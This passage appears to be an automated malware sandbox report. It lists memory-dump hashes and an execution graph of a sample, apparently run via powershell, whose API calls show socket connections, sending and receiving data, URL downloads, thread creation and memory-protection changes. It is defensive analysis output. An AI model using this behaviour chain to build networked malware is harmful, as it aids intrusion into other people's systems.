                                                                                                                                        • Instruction Fuzzy Hash: 4CE0D8717042448BDF35667090223EE7761AFA2250F6040E7E45097349CBF88C87C362
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369432967.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_410000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (:'$(:'$(:'$@#|e$@#|e$@#|e$@#|e$H;'$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:'$L:'$L:'
                                                                                                                                        • API String ID: 0-2375106800
                                                                                                                                        • Opcode ID: 4e4b7adccc07c578ab08c92e625bac133991865034735a16cb9d2f77d4d4fc2a
                                                                                                                                        • Instruction ID: 7717427e2c9baf3ed7a2934c0efae8af6008b320581e95580bee459b211c361a
                                                                                                                                        • Opcode Fuzzy Hash: 4e4b7adccc07c578ab08c92e625bac133991865034735a16cb9d2f77d4d4fc2a
                                                                                                                                        • Instruction Fuzzy Hash: B2E1E031B00218EFDB259A64D8107AF77A2AB81311F248077E945DB391DBB9DDC1CBA6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369432967.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_410000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $;'$$;'$$;'$@#|e$@#|e$L4#p$L4#p$L4#p
                                                                                                                                        • API String ID: 0-1122429790
                                                                                                                                        • Opcode ID: cd2716761e87ebb5c5b54f23d90675a9101934daf01f3451ad15f24b8a3fc8ec
                                                                                                                                        • Instruction ID: fd360b42fcee20416a9ba5e5e4d0923817585726bd30d2d5197cebad65879181
                                                                                                                                        • Opcode Fuzzy Hash: cd2716761e87ebb5c5b54f23d90675a9101934daf01f3451ad15f24b8a3fc8ec
                                                                                                                                        • Instruction Fuzzy Hash: 8061F135700254AFDB159A64D8107EF7BA2AF81310F148076E9158B3D1DBB8EDD1CBA6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000008.00000002.369432967.0000000000410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_8_2_410000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @#|e$L4#p$L4#p$L4#p$L:'$L:'
                                                                                                                                        • API String ID: 0-3824505749
                                                                                                                                        • Opcode ID: 6f2b9b94b849dd5d04bf4e20d3dcbadc24fd92be8c909cc263331948cf5da642
                                                                                                                                        • Instruction ID: a77b170c162bfa89a6b045f0aef482ae24891e78953de70e9f2de90c6296c04c
                                                                                                                                        • Opcode Fuzzy Hash: 6f2b9b94b849dd5d04bf4e20d3dcbadc24fd92be8c909cc263331948cf5da642
                                                                                                                                        • Instruction Fuzzy Hash: B441A031A00208EFDF24CE54D580BEA77A6AB40311F598166E9149B391D7F8DDD1CBAA

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:5.9%
                                                                                                                                        Dynamic/Decrypted Code Coverage:19.5%
                                                                                                                                        Signature Coverage:4%
                                                                                                                                        Total number of Nodes:1534
                                                                                                                                        Total number of Limit Nodes:43
                                                                                                                                        execution_graph 53074 415d41 53089 41b411 53074->53089 53076 415d4a 53100 4020f6 53076->53100 53081 4170c4 53124 401e8d 53081->53124 53085 401fd8 11 API calls 53086 4170d9 53085->53086 53087 401fd8 11 API calls 53086->53087 53088 4170e5 53087->53088 53130 4020df 53089->53130 53094 41b456 InternetReadFile 53099 41b479 53094->53099 53095 41b4a6 InternetCloseHandle InternetCloseHandle 53097 41b4b8 53095->53097 53097->53076 53098 401fd8 11 API calls 53098->53099 53099->53094 53099->53095 53099->53098 53141 4020b7 53099->53141 53101 40210c 53100->53101 53102 4023ce 11 API calls 53101->53102 53103 402126 53102->53103 53104 402569 28 API calls 53103->53104 53105 402134 53104->53105 53106 404aa1 53105->53106 53107 404ab4 53106->53107 53208 40520c 53107->53208 53109 404ac9 _Yarn 53110 404b40 WaitForSingleObject 53109->53110 53111 404b20 53109->53111 53113 404b56 53110->53113 53112 404b32 send 53111->53112 53114 404b7b 53112->53114 53214 4210cb 54 API calls 53113->53214 53117 401fd8 11 API calls 53114->53117 53116 404b69 SetEvent 53116->53114 53118 404b83 53117->53118 53119 401fd8 11 API calls 53118->53119 53120 404b8b 53119->53120 53120->53081 53121 401fd8 53120->53121 53122 4023ce 11 API calls 53121->53122 53123 401fe1 53122->53123 53123->53081 53125 402163 53124->53125 53129 40219f 53125->53129 53232 402730 11 API calls 53125->53232 53127 402184 53233 402712 11 API calls std::_Deallocate 53127->53233 53129->53085 53131 4020e7 53130->53131 53147 4023ce 53131->53147 53133 4020f2 53134 43bda0 53133->53134 53139 4461b8 __Getctype 53134->53139 53135 4461f6 53163 44062d 20 API calls __dosmaperr 53135->53163 53136 4461e1 RtlAllocateHeap 53138 41b42f InternetOpenW InternetOpenUrlW 53136->53138 53136->53139 53138->53094 53139->53135 53139->53136 53162 443001 7 API calls 2 library calls 53139->53162 53142 4020bf 53141->53142 53143 4023ce 11 API calls 53142->53143 53144 4020ca 53143->53144 53164 40250a 53144->53164 53146 4020d9 53146->53099 53148 402428 53147->53148 53149 4023d8 53147->53149 53148->53133 53149->53148 53151 4027a7 53149->53151 53152 402e21 53151->53152 53155 4016b4 53152->53155 53154 402e30 53154->53148 53156 4016c6 53155->53156 53157 4016cb 53155->53157 53161 43bd68 11 API calls _abort 53156->53161 53157->53156 53158 4016f3 53157->53158 53158->53154 53160 43bd67 53161->53160 53162->53139 53163->53138 53165 40251a 53164->53165 53166 402520 53165->53166 53167 402535 53165->53167 53171 402569 53166->53171 53181 4028e8 53167->53181 53170 402533 53170->53146 53192 402888 53171->53192 53173 40257d 53174 402592 53173->53174 53175 4025a7 53173->53175 53197 402a34 22 API calls 53174->53197 53177 4028e8 28 API calls 53175->53177 53180 4025a5 53177->53180 53178 40259b 53198 4029da 22 API calls 53178->53198 53180->53170 53182 4028f1 53181->53182 53183 402953 53182->53183 53184 4028fb 53182->53184 53206 4028a4 22 API calls 53183->53206 53187 402904 53184->53187 53189 402917 53184->53189 53200 402cae 53187->53200 53188 402915 53188->53170 53189->53188 53191 4023ce 11 API calls 53189->53191 53191->53188 53193 402890 53192->53193 53194 402898 53193->53194 53199 402ca3 22 API calls 53193->53199 53194->53173 53197->53178 53198->53180 53201 402cb8 __EH_prolog 53200->53201 53207 402e54 22 API calls 53201->53207 53203 4023ce 11 API calls 53205 402d92 53203->53205 53204 402d24 53204->53203 53205->53188 53207->53204 53209 405214 53208->53209 53210 4023ce 11 API calls 53209->53210 53211 40521f 53210->53211 53215 405234 53211->53215 53213 40522e 53213->53109 53214->53116 53216 405240 53215->53216 53217 40526e 53215->53217 53218 4028e8 28 API calls 53216->53218 53231 4028a4 22 API calls 53217->53231 53220 40524a 53218->53220 53220->53213 53232->53127 53233->53129 53234 10006d60 53235 10006d69 53234->53235 53236 10006d72 53234->53236 53238 10006c5f 53235->53238 53258 10005af6 GetLastError 53238->53258 53240 10006c6c 53278 10006d7e 53240->53278 53242 10006c74 53287 100069f3 53242->53287 53245 10006c8b 53245->53236 53251 10006cc9 53311 10006368 19 API calls __dosmaperr 53251->53311 53253 10006d12 53254 10006cce 53253->53254 53314 100068c9 25 API calls 53253->53314 53312 1000571e 19 API calls __dosmaperr 53254->53312 53255 10006ce6 53255->53253 53313 1000571e 19 API calls __dosmaperr 53255->53313 53259 10005b12 53258->53259 53260 10005b0c 53258->53260 53264 10005b61 SetLastError 53259->53264 53316 1000637b 19 API calls 2 library calls 53259->53316 53315 10005e08 10 API calls 2 library calls 53260->53315 53263 10005b24 53265 10005b2c 53263->53265 53318 10005e5e 10 API calls 2 library calls 53263->53318 53264->53240 53317 1000571e 19 API calls __dosmaperr 53265->53317 53267 10005b41 53267->53265 53269 10005b48 53267->53269 53319 1000593c 19 API calls _abort 53269->53319 53270 10005b32 53272 10005b6d SetLastError 53270->53272 53321 100055a8 36 API calls _abort 53272->53321 53273 10005b53 53320 1000571e 19 API calls __dosmaperr 53273->53320 53277 10005b5a 53277->53264 53277->53272 53279 10006d8a ___scrt_is_nonwritable_in_current_image 53278->53279 53280 10005af6 _abort 36 API calls 53279->53280 53285 10006d94 53280->53285 53282 10006e18 _abort 53282->53242 53285->53282 53322 100055a8 36 API calls _abort 53285->53322 53323 10005671 RtlEnterCriticalSection 53285->53323 53324 1000571e 19 API calls __dosmaperr 53285->53324 53325 10006e0f RtlLeaveCriticalSection _abort 53285->53325 53326 100054a7 53287->53326 53290 10006a14 GetOEMCP 53292 10006a3d 53290->53292 53291 10006a26 53291->53292 53293 10006a2b GetACP 53291->53293 53292->53245 53294 100056d0 53292->53294 53293->53292 53295 1000570e 53294->53295 53299 100056de _abort 53294->53299 53337 10006368 19 API calls __dosmaperr 53295->53337 53296 100056f9 RtlAllocateHeap 53298 1000570c 53296->53298 53296->53299 53298->53254 53301 10006e20 53298->53301 53299->53295 53299->53296 53336 1000474f 7 API calls 2 library calls 53299->53336 53302 100069f3 38 API calls 53301->53302 53303 10006e3f 53302->53303 53306 10006e90 IsValidCodePage 53303->53306 53308 10006e46 53303->53308 53310 10006eb5 ___scrt_fastfail 53303->53310 53305 10006cc1 53305->53251 53305->53255 53307 10006ea2 GetCPInfo 53306->53307 53306->53308 53307->53308 53307->53310 53348 10002ada 53308->53348 53338 10006acb GetCPInfo 53310->53338 53311->53254 53312->53245 53313->53253 53314->53254 53315->53259 53316->53263 53317->53270 53318->53267 53319->53273 53320->53277 53323->53285 53324->53285 53325->53285 53327 100054c4 53326->53327 53333 100054ba 53326->53333 53328 10005af6 _abort 36 API calls 53327->53328 53327->53333 53329 100054e5 53328->53329 53334 10007a00 36 API calls __fassign 53329->53334 53331 100054fe 53335 10007a2d 36 API calls __fassign 53331->53335 53333->53290 53333->53291 53334->53331 53335->53333 53336->53299 53337->53298 53344 10006b05 53338->53344 53347 10006baf 53338->53347 53341 10002ada _ValidateLocalCookies 5 API calls 53343 10006c5b 53341->53343 53343->53308 53355 100086e4 53344->53355 53346 10008a3e 41 API calls 53346->53347 53347->53341 53349 10002ae3 53348->53349 53350 10002ae5 IsProcessorFeaturePresent 53348->53350 53349->53305 53352 10002b58 53350->53352 53425 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53352->53425 53354 10002c3b 53354->53305 53356 100054a7 __fassign 36 API calls 53355->53356 53357 10008704 MultiByteToWideChar 53356->53357 53359 10008742 53357->53359 53367 100087da 53357->53367 53361 100056d0 20 API calls 53359->53361 53364 10008763 ___scrt_fastfail 53359->53364 53360 10002ada _ValidateLocalCookies 5 API calls 53362 10006b66 53360->53362 53361->53364 53369 10008a3e 53362->53369 53363 100087d4 53374 10008801 19 API calls _free 53363->53374 53364->53363 53366 100087a8 MultiByteToWideChar 53364->53366 53366->53363 53368 100087c4 GetStringTypeW 53366->53368 53367->53360 53368->53363 53370 100054a7 __fassign 36 API calls 53369->53370 53371 10008a51 53370->53371 53375 10008821 53371->53375 53374->53367 53376 1000883c 53375->53376 53377 10008862 MultiByteToWideChar 53376->53377 53378 10008a16 53377->53378 53379 1000888c 53377->53379 53380 10002ada _ValidateLocalCookies 5 API calls 53378->53380 53383 100056d0 20 API calls 53379->53383 53384 100088ad 53379->53384 53381 10006b87 53380->53381 53381->53346 53382 100088f6 MultiByteToWideChar 53385 1000890f 53382->53385 53397 10008962 53382->53397 53383->53384 53384->53382 53384->53397 53402 10005f19 53385->53402 53389 10008971 53391 10008992 53389->53391 53392 100056d0 20 API calls 53389->53392 53390 10008939 53394 10005f19 10 API calls 53390->53394 53390->53397 53393 10008a07 53391->53393 53396 10005f19 10 API calls 53391->53396 53392->53391 53410 10008801 19 API calls _free 53393->53410 53394->53397 53398 100089e6 53396->53398 53411 10008801 19 API calls _free 53397->53411 53398->53393 53399 100089f5 WideCharToMultiByte 53398->53399 53399->53393 53400 10008a35 53399->53400 53412 10008801 19 API calls _free 53400->53412 53413 10005c45 53402->53413 53404 10005f40 53407 10005f49 53404->53407 53417 10005fa1 9 API calls 2 library calls 53404->53417 53406 10005f89 LCMapStringW 53406->53407 53408 10002ada _ValidateLocalCookies 5 API calls 53407->53408 53409 10005f9b 53408->53409 53409->53389 53409->53390 53409->53397 53410->53397 53411->53378 53412->53397 53414 10005c71 53413->53414 53416 10005c75 __crt_fast_encode_pointer 53413->53416 53414->53416 53418 10005ce1 53414->53418 53416->53404 53417->53406 53419 10005d02 LoadLibraryExW 53418->53419 53420 10005cf7 53418->53420 53421 10005d37 53419->53421 53422 10005d1f GetLastError 53419->53422 53420->53414 53421->53420 53424 10005d4e FreeLibrary 53421->53424 53422->53421 53423 10005d2a LoadLibraryExW 53422->53423 53423->53421 53424->53420 53425->53354 53426 434906 53431 434bd8 SetUnhandledExceptionFilter 53426->53431 53428 43490b pre_c_initialization 53432 4455cc 20 API calls 2 library calls 53428->53432 53430 434916 53431->53428 53432->53430 53433 1000c7a7 53434 1000c7be 53433->53434 53439 1000c82c 53433->53439 53434->53439 53443 1000c7e6 GetModuleHandleA 53434->53443 53435 1000c872 53436 1000c835 GetModuleHandleA 53438 1000c83f 53436->53438 53438->53438 53438->53439 53439->53435 53439->53436 53444 1000c7ef 53443->53444 53450 1000c82c 53443->53450 53453 1000c803 53444->53453 53446 1000c872 53447 1000c835 GetModuleHandleA 53448 1000c83f 53447->53448 53448->53448 53448->53450 53450->53446 53450->53447 53454 1000c809 53453->53454 53455 1000c82c 53454->53455 53456 1000c80d VirtualProtect 53454->53456 53458 1000c835 GetModuleHandleA 53455->53458 53459 1000c872 53455->53459 53456->53455 53457 1000c81c VirtualProtect 53456->53457 53457->53455 53460 1000c83f 53458->53460 53460->53455 53461 43bea8 53464 43beb4 _swprintf ___DestructExceptionObject 53461->53464 53462 43bec2 53477 44062d 20 API calls __dosmaperr 53462->53477 53464->53462 53465 43beec 53464->53465 53472 445909 EnterCriticalSection 53465->53472 53467 43bec7 ___DestructExceptionObject _abort 53468 43bef7 53473 43bf98 53468->53473 53472->53468 53474 43bfa6 53473->53474 53474->53474 53476 43bf02 53474->53476 53479 4497ec 37 API calls 2 library calls 53474->53479 53478 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 53476->53478 53477->53467 53478->53467 53479->53474 53480 4458c8 53482 4458d3 53480->53482 53483 4458fc 53482->53483 53484 4458f8 53482->53484 53486 448b04 53482->53486 53493 445920 DeleteCriticalSection 53483->53493 53494 44854a 53486->53494 53489 448b49 InitializeCriticalSectionAndSpinCount 53490 448b34 53489->53490 53501 43502b 53490->53501 53492 448b60 53492->53482 53493->53484 53495 448576 53494->53495 53496 44857a 53494->53496 53495->53496 53498 44859a 53495->53498 53508 4485e6 53495->53508 53496->53489 53496->53490 53498->53496 53499 4485a6 GetProcAddress 53498->53499 53500 4485b6 __crt_fast_encode_pointer 53499->53500 53500->53496 53502 435036 IsProcessorFeaturePresent 53501->53502 53503 435034 53501->53503 53505 435078 53502->53505 53503->53492 53515 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53505->53515 53507 43515b 53507->53492 53509 448607 LoadLibraryExW 53508->53509 53514 4485fc 53508->53514 53510 448624 GetLastError 53509->53510 53511 44863c 53509->53511 53510->53511 53512 44862f LoadLibraryExW 53510->53512 53513 448653 FreeLibrary 53511->53513 53511->53514 53512->53511 53513->53514 53514->53495 53515->53507 53516 41e04e 53517 41e063 _Yarn ___scrt_get_show_window_mode 53516->53517 53518 41e266 53517->53518 53535 432f55 21 API calls _Yarn 53517->53535 53524 41e21a 53518->53524 53530 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 53518->53530 53521 41e277 53521->53524 53531 432f55 21 API calls _Yarn 53521->53531 53523 41e213 ___scrt_get_show_window_mode 53523->53524 53536 432f55 21 API calls _Yarn 53523->53536 53526 41e2b0 ___scrt_get_show_window_mode 53526->53524 53532 4335db 53526->53532 53528 41e240 ___scrt_get_show_window_mode 53528->53524 53537 432f55 21 API calls _Yarn 53528->53537 53530->53521 53531->53526 53538 4334fa 53532->53538 53534 4335e3 53534->53524 53535->53523 53536->53528 53537->53518 53539 433513 53538->53539 53543 433509 53538->53543 53539->53543 53544 432f55 21 API calls _Yarn 53539->53544 53541 433534 53541->53543 53545 4338c8 CryptAcquireContextA 53541->53545 53543->53534 53544->53541 53546 4338e9 CryptGenRandom 53545->53546 53547 4338e4 53545->53547 53546->53547 53548 4338fe CryptReleaseContext 53546->53548 53547->53543 53548->53547 53549 426c6d 53555 426d42 recv 53549->53555 53556 426a77 53557 426a8c 53556->53557 53569 426b1e 53556->53569 53558 426b83 53557->53558 53559 426bae 53557->53559 53562 426b0e 53557->53562 53566 426b4e 53557->53566 53568 426ad9 53557->53568 53557->53569 53570 426bd5 53557->53570 53584 424f6e 49 API calls _Yarn 53557->53584 53558->53559 53588 425781 21 API calls 53558->53588 53559->53569 53559->53570 53572 425b72 53559->53572 53562->53566 53562->53569 53586 424f6e 49 API calls _Yarn 53562->53586 53566->53558 53566->53569 53587 41fbfd 52 API calls 53566->53587 53568->53562 53568->53569 53585 41fbfd 52 API calls 53568->53585 53570->53569 53589 4261e6 28 API calls 53570->53589 53573 425b91 ___scrt_get_show_window_mode 53572->53573 53575 425ba0 53573->53575 53579 425bc5 53573->53579 53590 41ec4c 21 API calls 53573->53590 53575->53579 53583 425ba5 53575->53583 53591 420669 46 API calls 53575->53591 53578 425bae 53578->53579 53594 424d96 21 API calls 2 library calls 53578->53594 53579->53570 53581 425c48 53581->53579 53592 432f55 21 API calls _Yarn 53581->53592 53583->53578 53583->53579 53593 41daf0 49 API calls 53583->53593 53584->53568 53585->53568 53586->53566 53587->53566 53588->53559 53589->53569 53590->53575 53591->53581 53592->53583 53593->53578 53594->53579 53595 4165db 53606 401e65 53595->53606 53597 4165eb 53598 4020f6 28 API calls 53597->53598 53599 4165f6 53598->53599 53600 401e65 22 API calls 53599->53600 53601 416601 53600->53601 53602 4020f6 28 API calls 53601->53602 53603 41660c 53602->53603 53611 412965 53603->53611 53607 401e6d 53606->53607 53608 401e75 53607->53608 53630 402158 22 API calls 53607->53630 53608->53597 53631 40482d 53611->53631 53613 412979 53638 4048c8 connect 53613->53638 53617 41299a 53703 402f10 53617->53703 53620 404aa1 61 API calls 53621 4129ae 53620->53621 53622 401fd8 11 API calls 53621->53622 53623 4129b6 53622->53623 53708 404c10 53623->53708 53626 401fd8 11 API calls 53627 4129cc 53626->53627 53628 401fd8 11 API calls 53627->53628 53629 4129d4 53628->53629 53632 404846 socket 53631->53632 53633 404839 53631->53633 53634 404860 CreateEventW 53632->53634 53635 404842 53632->53635 53726 40489e WSAStartup 53633->53726 53634->53613 53635->53613 53637 40483e 53637->53632 53637->53635 53639 404a1b 53638->53639 53640 4048ee 53638->53640 53641 40497e 53639->53641 53642 404a21 WSAGetLastError 53639->53642 53640->53641 53643 404923 53640->53643 53727 40531e 53640->53727 53698 402f31 53641->53698 53642->53641 53644 404a31 53642->53644 53762 420cf1 27 API calls 53643->53762 53646 404932 53644->53646 53647 404a36 53644->53647 53652 402093 28 API calls 53646->53652 53767 41cb72 30 API calls 53647->53767 53649 40490f 53732 402093 53649->53732 53651 40492b 53651->53646 53655 404941 53651->53655 53656 404a80 53652->53656 53654 404a40 53768 4052fd 28 API calls 53654->53768 53662 404950 53655->53662 53663 404987 53655->53663 53659 402093 28 API calls 53656->53659 53664 404a8f 53659->53664 53666 402093 28 API calls 53662->53666 53764 421ad1 54 API calls 53663->53764 53667 41b580 80 API calls 53664->53667 53670 40495f 53666->53670 53667->53641 53673 402093 28 API calls 53670->53673 53671 40498f 53674 4049c4 53671->53674 53675 404994 53671->53675 53677 40496e 53673->53677 53766 420e97 28 API calls 53674->53766 53679 402093 28 API calls 53675->53679 53682 41b580 80 API calls 53677->53682 53681 4049a3 53679->53681 53684 402093 28 API calls 53681->53684 53685 404973 53682->53685 53683 4049cc 53686 4049f9 CreateEventW CreateEventW 53683->53686 53688 402093 28 API calls 53683->53688 53687 4049b2 53684->53687 53763 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53685->53763 53686->53641 53689 41b580 80 API calls 53687->53689 53691 4049e2 53688->53691 53692 4049b7 53689->53692 53693 402093 28 API calls 53691->53693 53765 421143 52 API calls 53692->53765 53695 4049f1 53693->53695 53696 41b580 80 API calls 53695->53696 53697 4049f6 53696->53697 53697->53686 53699 4020df 11 API calls 53698->53699 53700 402f3d 53699->53700 53701 4032a0 28 API calls 53700->53701 53702 402f59 53701->53702 53702->53617 53819 401fb0 53703->53819 53705 402f1e 53706 402055 11 API calls 53705->53706 53707 402f2d 53706->53707 53707->53620 53709 4020df 11 API calls 53708->53709 53710 404c27 53709->53710 53711 4020df 11 API calls 53710->53711 53718 404c30 53711->53718 53712 43bda0 _Yarn 21 API calls 53712->53718 53714 4020b7 28 API calls 53714->53718 53715 404ca1 53849 404e26 WaitForSingleObject 53715->53849 53718->53712 53718->53714 53718->53715 53719 401fd8 11 API calls 53718->53719 53822 404b96 53718->53822 53828 401fe2 53718->53828 53837 404cc3 53718->53837 53719->53718 53721 401fd8 11 API calls 53722 404cb1 53721->53722 53723 401fd8 11 API calls 53722->53723 53724 404cba 53723->53724 53724->53626 53726->53637 53728 4020df 11 API calls 53727->53728 53729 40532a 53728->53729 53769 4032a0 53729->53769 53731 405346 53731->53649 53733 40209b 53732->53733 53734 4023ce 11 API calls 53733->53734 53735 4020a6 53734->53735 53773 4024ed 53735->53773 53738 41b580 53739 41b631 53738->53739 53740 41b596 GetLocalTime 53738->53740 53741 401fd8 11 API calls 53739->53741 53742 40531e 28 API calls 53740->53742 53743 41b639 53741->53743 53744 41b5d8 53742->53744 53745 401fd8 11 API calls 53743->53745 53777 406383 53744->53777 53748 41b641 53745->53748 53748->53643 53749 402f10 28 API calls 53750 41b5f0 53749->53750 53751 406383 28 API calls 53750->53751 53752 41b5fc 53751->53752 53782 40723b 77 API calls 53752->53782 53754 41b60a 53755 401fd8 11 API calls 53754->53755 53756 41b616 53755->53756 53757 401fd8 11 API calls 53756->53757 53758 41b61f 53757->53758 53759 401fd8 11 API calls 53758->53759 53760 41b628 53759->53760 53761 401fd8 11 API calls 53760->53761 53761->53739 53762->53651 53763->53641 53764->53671 53765->53685 53766->53683 53767->53654 53771 4032aa 53769->53771 53770 4032c9 53770->53731 53771->53770 53772 4028e8 28 API calls 53771->53772 53772->53770 53774 4024f9 53773->53774 53775 40250a 28 API calls 53774->53775 53776 4020b1 53775->53776 53776->53738 53783 4051ef 53777->53783 53779 406391 53787 402055 53779->53787 53782->53754 53784 4051fb 53783->53784 53793 405274 53784->53793 53786 405208 53786->53779 53788 402061 53787->53788 53789 4023ce 11 API calls 53788->53789 53790 40207b 53789->53790 53815 40267a 53790->53815 53794 405282 53793->53794 53795 405288 53794->53795 53796 40529e 53794->53796 53804 4025f0 53795->53804 53798 4052f5 53796->53798 53799 4052b6 53796->53799 53813 4028a4 22 API calls 53798->53813 53802 4028e8 28 API calls 53799->53802 53803 40529c 53799->53803 53802->53803 53803->53786 53805 402888 22 API calls 53804->53805 53806 402602 53805->53806 53807 402672 53806->53807 53808 402629 53806->53808 53814 4028a4 22 API calls 53807->53814 53810 4028e8 28 API calls 53808->53810 53812 40263b 53808->53812 53810->53812 53812->53803 53816 40268b 53815->53816 53817 4023ce 11 API calls 53816->53817 53818 40208d 53817->53818 53818->53749 53820 4025f0 28 API calls 53819->53820 53821 401fbd 53820->53821 53821->53705 53823 404ba0 WaitForSingleObject 53822->53823 53824 404bcd recv 53822->53824 53862 421107 54 API calls 53823->53862 53826 404be0 53824->53826 53826->53718 53827 404bbc SetEvent 53827->53826 53829 401ff1 53828->53829 53830 402039 53828->53830 53831 4023ce 11 API calls 53829->53831 53830->53718 53832 401ffa 53831->53832 53833 40203c 53832->53833 53835 402015 53832->53835 53834 40267a 11 API calls 53833->53834 53834->53830 53863 403098 28 API calls 53835->53863 53838 4020df 11 API calls 53837->53838 53848 404cde 53838->53848 53839 404e13 53840 401fd8 11 API calls 53839->53840 53841 404e1c 53840->53841 53841->53718 53842 4041a2 28 API calls 53842->53848 53843 401fe2 28 API calls 53843->53848 53844 401fd8 11 API calls 53844->53848 53845 4020f6 28 API calls 53845->53848 53848->53839 53848->53842 53848->53843 53848->53844 53848->53845 53864 401fc0 53848->53864 53850 404e40 SetEvent CloseHandle 53849->53850 53851 404e57 closesocket 53849->53851 53852 404ca8 53850->53852 53853 404e64 53851->53853 53852->53721 53854 404e7a 53853->53854 54190 4050e4 84 API calls 53853->54190 53855 404e8c WaitForSingleObject 53854->53855 53856 404ece SetEvent CloseHandle 53854->53856 54191 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53855->54191 53856->53852 53859 404e9b SetEvent WaitForSingleObject 54192 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53859->54192 53861 404eb3 SetEvent CloseHandle CloseHandle 53861->53856 53862->53827 53863->53830 53865 401fd2 CreateEventA CreateThread WaitForSingleObject CloseHandle 53864->53865 53866 401fc9 53864->53866 53865->53848 53869 415b25 53865->53869 53868 4025e0 28 API calls 53866->53868 53868->53865 53870 4020f6 28 API calls 53869->53870 53871 415b47 SetEvent 53870->53871 53872 415b5c 53871->53872 53948 4041a2 53872->53948 53875 4020f6 28 API calls 53876 415b86 53875->53876 53877 4020f6 28 API calls 53876->53877 53878 415b98 53877->53878 53951 41beac 53878->53951 53881 415bc1 GetTickCount 53973 41bc1f 53881->53973 53882 415d20 53945 415d11 53882->53945 53946 415d34 53882->53946 53883 401e8d 11 API calls 53885 4170cd 53883->53885 53888 401fd8 11 API calls 53885->53888 53890 4170d9 53888->53890 53892 401fd8 11 API calls 53890->53892 53891 415bde 53894 41bc1f 28 API calls 53891->53894 53893 4170e5 53892->53893 53895 415be9 53894->53895 53979 41bb27 53895->53979 53900 401e65 22 API calls 53901 415c13 53900->53901 53902 402f31 28 API calls 53901->53902 53903 415c21 53902->53903 53988 402ea1 28 API calls 53903->53988 53905 415c30 53906 402f10 28 API calls 53905->53906 53907 415c3f 53906->53907 53989 402ea1 28 API calls 53907->53989 53909 415c4e 53910 402f10 28 API calls 53909->53910 53911 415c5a 53910->53911 53990 402ea1 28 API calls 53911->53990 53913 415c64 53914 404aa1 61 API calls 53913->53914 53915 415c73 53914->53915 53916 401fd8 11 API calls 53915->53916 53917 415c7c 53916->53917 53918 401fd8 11 API calls 53917->53918 53919 415c88 53918->53919 53920 401fd8 11 API calls 53919->53920 53921 415c94 53920->53921 53922 401fd8 11 API calls 53921->53922 53923 415ca0 53922->53923 53924 401fd8 11 API calls 53923->53924 53925 415cac 53924->53925 53926 401fd8 11 API calls 53925->53926 53927 415cb8 53926->53927 53991 401f09 53927->53991 53930 401fd8 11 API calls 53931 415cca 53930->53931 53932 401fd8 11 API calls 53931->53932 53933 415cd3 53932->53933 53934 401e65 22 API calls 53933->53934 53935 415cde 53934->53935 53994 43bb2c 53935->53994 53938 415cf0 53941 415d09 53938->53941 53942 415cfe 53938->53942 53939 415d16 53940 401e65 22 API calls 53939->53940 53940->53882 53999 404f51 53941->53999 53998 404ff4 82 API calls 53942->53998 53945->53883 54014 4050e4 84 API calls 53946->54014 53947 415d04 53947->53945 54015 40423a 53948->54015 53952 4020df 11 API calls 53951->53952 53972 41bebf 53952->53972 53953 41bf2f 53954 401fd8 11 API calls 53953->53954 53955 41bf61 53954->53955 53957 401fd8 11 API calls 53955->53957 53956 41bf31 53960 4041a2 28 API calls 53956->53960 53959 41bf69 53957->53959 53958 4041a2 28 API calls 53958->53972 53962 401fd8 11 API calls 53959->53962 53961 41bf3d 53960->53961 53963 401fe2 28 API calls 53961->53963 53965 415ba1 53962->53965 53966 41bf46 53963->53966 53964 401fe2 28 API calls 53964->53972 53965->53881 53965->53882 53965->53945 53967 401fd8 11 API calls 53966->53967 53969 41bf4e 53967->53969 53968 401fd8 11 API calls 53968->53972 53970 41cec5 28 API calls 53969->53970 53970->53953 53972->53953 53972->53956 53972->53958 53972->53964 53972->53968 54021 41cec5 53972->54021 54057 441ed1 53973->54057 53976 402093 28 API calls 53977 415bd2 53976->53977 53978 41bb77 GetLastInputInfo GetTickCount 53977->53978 53978->53891 54066 436f10 53979->54066 53984 41bdaf 53985 41bdbc 53984->53985 53986 4020b7 28 API calls 53985->53986 53987 415c05 53986->53987 53987->53900 53988->53905 53989->53909 53990->53913 53992 402252 11 API calls 53991->53992 53993 401f12 53992->53993 53993->53930 53995 43bb45 _strftime 53994->53995 54115 43ae83 53995->54115 53997 415ceb 53997->53938 53997->53939 53998->53947 54000 404f65 53999->54000 54001 404fea 53999->54001 54002 404f6e 54000->54002 54003 404fc0 CreateEventA CreateThread 54000->54003 54004 404f7d GetLocalTime 54000->54004 54001->53945 54002->54003 54003->54001 54186 405150 54003->54186 54005 41bc1f 28 API calls 54004->54005 54006 404f91 54005->54006 54185 4052fd 28 API calls 54006->54185 54014->53947 54016 404243 54015->54016 54017 4023ce 11 API calls 54016->54017 54018 40424e 54017->54018 54019 402569 28 API calls 54018->54019 54020 4041b5 54019->54020 54020->53875 54022 41ced2 